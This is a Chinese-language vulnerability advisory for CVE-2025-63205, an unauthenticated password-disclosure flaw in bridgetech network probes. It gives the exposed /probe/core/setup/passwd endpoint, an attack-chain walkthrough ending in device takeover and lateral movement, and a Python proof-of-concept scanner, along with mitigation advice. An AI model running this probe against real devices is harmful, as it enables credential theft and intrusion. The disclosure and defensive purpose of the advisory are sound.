IPBUF安全漏洞报告
English
CVE-2025-63205 CVSS 7.5 高危

CVE-2025-63205: bridgetech probes 敏感信息泄露漏洞

披露日期: 2025-11-19
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-63205
漏洞类型
敏感信息泄露
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
VB220 IP Network Probe, VB120 Embedded IP + RF Probe, VB330 High-Capacity Probe, VB440 ST 2110 Production Analytics Probe, NOMAD

相关标签

CVE-2025-63205信息泄露敏感信息泄露无需认证bridgetechVB220VB120VB330VB440NOMAD

漏洞概述

CVE-2025-63205是bridgetech公司生产的多个网络探针设备中存在的信息泄露漏洞。该漏洞影响VB220 IP Network Probe、VB120 Embedded IP + RF Probe、VB330 High-Capacity Probe、VB440 ST 2110 Production Analytics Probe以及NOMAD等产品。攻击者无需认证即可通过访问特定的API端点获取敏感信息,包括管理员密码等凭据。由于该漏洞允许在网络上无需任何权限即可访问敏感数据,因此具有较高的安全风险。CVSS评分7.5分,主要影响系统的机密性。值得注意的是,供应商对此漏洞的受影响版本存在争议,供应商表示6.5.0-9版本不受影响,实际受影响的是5.6.0-3及更早版本,而5.6.0-4(2020-09-21)及之后版本已修复。

技术细节

该漏洞属于敏感信息泄露类型,攻击者可以通过访问/probe/core/setup/passwd端点获取管理员密码等敏感凭据。由于漏洞利用无需任何认证(PR:N),攻击者只需能够访问设备的网络接口即可发起攻击。CVSS向量显示攻击复杂度低(AC:L),无需用户交互(UI:N),攻击向量为网络层面(AV:N)。漏洞主要影响机密性(C:H),对完整性和可用性无影响(I:N, A:N)。攻击者获取管理员密码后可能进一步控制设备,执行横向移动或长期潜伏。建议受影响用户尽快升级到5.6.0-4或更高版本以修复此漏洞。

攻击链分析

STEP 1
步骤1: 侦察与发现
攻击者使用网络扫描工具发现暴露在网络中的bridgetech探针设备,识别其IP地址和开放端口
STEP 2
步骤2: 漏洞探测
攻击者直接访问/probe/core/setup/passwd端点,无需任何认证即可获取响应
STEP 3
步骤3: 敏感信息获取
响应内容包含管理员密码等敏感凭据信息,攻击者提取并解密这些凭据
STEP 4
步骤4: 权限提升与持久化
利用获取的管理员密码登录设备管理界面,可能进一步部署后门或修改配置
STEP 5
步骤5: 横向移动
以被控设备为跳板,攻击内网中的其他系统或设备,扩大攻击范围

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2025-63205 PoC - Bridgetech Probes Information Disclosure # Target: /probe/core/setup/passwd endpoint # Vulnerability: Unauthenticated access to administrator passwords def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-63205 """ endpoints = [ '/probe/core/setup/passwd', '/cgi-bin/probe/core/setup/passwd', '/api/probe/core/setup/passwd' ] for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: # Check if response contains password-like content content = response.text.lower() if 'password' in content or 'passwd' in content or 'admin' in content: print(f'[+] VULNERABLE: {url}') print(f'[+] Status Code: {response.status_code}') print(f'[+] Response Length: {len(response.content)} bytes') return True except requests.exceptions.RequestException as e: print(f'[-] Error accessing {url}: {e}') return False if __name__ == '__main__': import sys if len(sys.argv) < 2: print('Usage: python cve-2025-63205.py <target_url>') print('Example: python cve-2025-63205.py https://192.168.1.100') sys.exit(1) target = sys.argv[1] print(f'[*] Scanning target: {target}') print(f'[*] CVE-2025-63205 - Bridgetech Probes Information Disclosure\n') if check_vulnerability(target): print('\n[!] Target is vulnerable - sensitive information may be exposed') else: print('\n[*] Target appears to be patched or not vulnerable')

影响范围

VB220 IP Network Probe < 5.6.0-4
VB120 Embedded IP + RF Probe < 5.6.0-4
VB330 High-Capacity Probe < 5.6.0-4
VB440 ST 2110 Production Analytics Probe < 5.6.0-4
NOMAD < 5.6.0-4
固件版本 6.5.0-9(供应商声明不受影响)

防御指南

临时缓解措施
在网络层面实施访问控制,确保只有授权的管理网段可以访问探针设备的管理接口。将探针设备放置在独立的VLAN中,配置严格的防火墙规则限制对敏感端点的访问。同时监控网络流量,检测对/probe/core/setup/passwd端点的异常访问尝试。建议尽快升级到供应商发布的安全版本5.6.0-4或更新版本。如果无法立即升级,应实施网络隔离并加强监控措施。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表